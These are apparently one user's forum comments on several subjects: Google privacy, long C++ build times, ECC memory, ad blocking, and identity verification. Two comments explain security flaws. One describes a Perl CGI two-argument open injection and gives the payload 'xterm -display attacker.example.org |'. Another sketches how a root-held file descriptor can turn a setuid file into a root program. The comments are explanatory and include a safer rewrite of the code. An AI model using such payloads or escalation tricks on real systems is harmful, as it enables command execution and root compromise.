As it's opt-in like the Apple's version was it should really be useful and not nearly as scary as it could be. There something nice about easy access to store, business and review apps while shopping. I imagine Android will do even better as it has less worry about showing off the data it already knows about you. It's one of the reasons why Google Now can do better than Siri. (Except for voice recognization. I don't know why Google needs me to say somethings like 5 or 6 times before it understands me compared to iOS only messing up ocassionally. ) While I understand the privacy concerns, this is not really a new privacy issue as Google already has the data and would just be showing it. That said it also probably makes it more obivious to users how much data Google really has.
Theoretically I might be able to improve it, but several of the links involved take ~30 minutes and while I can have several links or other parts of the build at the same time it had to break down linking too much. I did a little though by subdivide the linking into partial links of related code in archive libraries. It reduces the overall optimization but speed up the linking. There still is some build system overhead that I can reduce. One of my largest savings was switching the build system from nested make files to monolithic one created by a hand tuned generator. If I did it today, I'd probably look at cmake and ninja.
I do have tricks that let developers test small changes to the code much quicker though so hard to justify optimizing more currently.
Mostly just commented to note that slow compile times are still a real thing, didn't really expect to get much into my tools work. Alas multitasking is as well, so compiling time doesn't always equal break time as implied by linked XKCD comic it equals switch gears to another task.
Yeah I'm also really surprised that ECC hasn't become more mainstream. I spent several weeks once chasing down a "compiler / build system" bug that turned out to be the result of a memory bit flip error that had the misfortune to ended up getting cached in the build avoidance system for a fairly static source file. One of the reasons I like server class build farms these days.
It's a C++ project with a large amount of optimization to ensure it fits in the tight memory requirements of an embedded system. It also has to compile a lot of the code multiple times as it targets an embedded system which have dissimilar nodes ( different CPU / memory architectures / devices etc. ).
The software I support takes about an hour to compile with a 20 way build on an enterprise class server blade farm. Before I optimized and increased the parallelization of the build process it used to take 10+ hours. Not every project compiles and links that quickly.
Old versions of articles are still viewable in the page history. I wonder if this related to the bots that I've seen recently that vandalize a page with "random" garbage and then immediately self-reverts.
Old versions of CGI could be tricked into returning something besides a file handle to $cgi->param( 'file' ). I imagine the exploit worked by using multiple "file" parameters in request. Where the first would be a text string and second would be a uploaded file. The returns of cgi->upload and cgi->param are normally arrays but in scalar context return just the first reverent value. So $cgi->upload( 'file' ) would return a true value but $cgi->param( 'file' ) would return the text from the request as it was before the upload. Perl has two basic forms of the open function. The 2 argument and 3 argument versions. The 3 argument version works more like the C standard system call open, but the two argument function respects piping and redirect characters. So if you got perl to take that user controlled string and treat it as a piped file name say "xterm -display attacker.example.org |" and the perl script just blindly opens that as a filename using the two argument form. ( Hint <...> uses the two argument form internally ) then you can pretty much get the script to run what ever you want. It's one of the reasons that CGI changed how upload files work in current versions, and perl handles <$var> differently than it used to. And also has the <<>> form which does the 3 argument version of open which treats names always as just filenames instead of possibly pipes etc.
CGI.pm is no longer included as part of core with the newest versions of perl and use of alternatives were highly recommended even before it's removal. See CGI::Alternatives for some alternatives. Also the above code seems to use an outdated approach to get upload temporary file handles ( using CGI::param instead of CGI::upload ). It also fails to pass perlcritic at least with the settings I use.
If I was using CGI I'd probably write the above code closer to the following ( dry-coded, untested as I don't have the CGI module installed on my system. )
#!/usr/bin/env perl
use strict;
use warnings;
use CGI;
use Carp;
use English qw{ -no_match_vars };
use Readonly;
Readonly my $BLOCK_SIZE => 1024;
my $cgi = CGI->new();
my ( $handle ) = $cgi->upload( q{file} );
if ( defined $handle ) {
my $buffer;
while ( my $bytes = $handle->read( $buffer, $BLOCK_SIZE ) ) {
print { \*STDOUT } $buffer
or croak q{I/O error: }, $ERRNO;
}
} ## end if ( defined $handle )
1;
Actually the style of my code would be a little different as I like to "use common::sense;" instead of "use strict; use warnings;" and a few other details.
Modern perl can be written fairly cleanly especially if one follows good coding practices. Tools like perlcritic and perltidy can help out a lot.
In general I don't block ads; but if some site, java script or the like annoys me enough I will block it at router. Currently I have some auto-play video scripts blocked, some scripts that randomly convert plain text into ad links, and for a while blocked a tracker that really slowed done the webpages. I've also blocked sites ocassionally if their ads or behavior was too annoying. For example I blocked Gizmodo a while back because of that stunt they pulled with TV remotes at some tech conference. In those cases if I end up following a link for some news to a blocked site I just searched for the news and read the story elsewhere. ( Very rare that only one place will talk about something. )
I also don't have flash installed ( and turned off a couple of video codecs that mostly just got used by autoplay videos ) in my main browser which ocassionally causes some sites to show a message accusing me of running an ad blocker where the flash ad would be. ( Surprised at how many sites just assume that a desktop browser must have flash or the like and don't check which codecs are installed. )
electric company account (please break in and pay my bill for me!)
You might want to move electric company account up the list. Utilities bills are often used as proof of address when verifying identity.
Since the article is talking about the UK guidelines here, check out this list.
electric company account (please break in and pay my bill for me!)
You might want to move electric company account up the list. Utilities bills are often used as proof of address when verifying identity.
Yeah booting from media is harder than it used to be, though single user mode and recovery partitions do most of it anyways. ( I actually run a netboot server myself, so just have to boot via network at worse. )
newgrp doesn't exit it but executes a child shell which replaces the newgrp process. It's within shell that has access to file descriptor 3.
For why the file needs to have the same setuid is that is what the exploit takes advantage of, normally writing to a setuid file clears the setuid bit, but that doesn't happen if the writer is already root. Which means that using the exploit ( and some tricks to get out of append mode ) someone can turn a setuid file into any program that will run as root when it is launched.
New York... when civilization falls apart, remember, we were way ahead of you. - David Letterman